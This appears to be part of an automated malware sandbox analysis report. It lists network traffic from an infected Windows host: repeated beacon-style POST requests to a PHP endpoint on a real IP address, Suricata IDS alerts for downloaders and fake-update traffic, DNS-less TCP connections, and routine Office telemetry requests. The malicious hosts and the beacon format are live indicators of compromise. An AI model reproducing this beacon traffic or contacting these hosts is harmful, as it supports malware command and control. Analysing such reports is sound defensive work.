                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                      Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49742 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49910 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:50048 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50110 -> 31.41.244.11:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50113 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50116 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50117 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50118 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50120 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50123 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50122 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50126 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50125 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50131 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50133 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50142 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50141 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50137 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50150 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50153 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50159 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50167 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50171 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50176 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50178 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50179 -> 185.215.113.16:80
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:52414 -> 20.42.65.92:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:52496 -> 52.182.143.214:443
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
